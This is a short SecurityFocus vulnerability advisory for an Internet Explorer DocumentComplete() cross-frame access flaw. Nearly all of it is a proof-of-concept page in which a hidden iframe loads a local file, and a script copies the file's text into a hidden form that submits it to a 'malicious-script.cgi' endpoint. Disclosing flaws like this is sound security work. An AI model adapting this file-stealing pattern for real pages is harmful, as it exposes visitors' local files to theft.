Microsoft IE DocumentComplete() Cross Frame Access Vulnerability

The following example illustrates this vulnerability:

<iframe id=clientContent width=0 height=0 noborder>
</iframe>
<script for=clientContent event="DocumentComplete(browser)">
alert (browser.document.body.innerText);

// browser is an instance of the IWebBrowser COM object

document.forms[0].elements[0].value = browser.document.body.innerText;
document.forms[0].submit ();

</script>

<script>
clientContent.navigate("c:\\known_file.txt")
</script>
<form action="/cgi/malicious-script.cgi" method=post onSubmit="window.alert(document.forms[0].elements[0].value); return
true">
<input name="file_text" type=hidden>
</form>


 

Privacy Statement
Copyright 2010, SecurityFocus